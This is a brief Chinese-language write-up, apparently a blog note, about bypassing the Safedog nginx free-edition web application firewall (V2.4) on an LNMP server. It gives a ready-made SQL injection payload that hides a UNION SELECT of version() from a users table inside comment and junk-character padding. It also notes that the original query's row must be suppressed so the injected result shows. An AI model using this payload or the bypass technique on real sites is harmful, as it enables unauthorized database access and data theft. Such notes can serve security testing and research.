环境 Lnmp
安全狗官方nginx免费版V2.4
看起来好像版本很低
Payload :'/*/*%/**/union/*/*%aaaaaa/**/allselect/*/*%aaaaaa/**/1,2,version()/*/*%aaaaaa/**/from users -- -
小坑
前面使用联合查询没构造错误条件的时候一直没爆出东西 然后就以为是安全狗拦截了 也是前面自己一直没想明白就走了弯路
正常情况下的联合查询
异常参数的查询
看到正常的查询他会返回两条结果,异常的只有一条,输出的时候他就会选择第一条数据而看不到我们查询的数据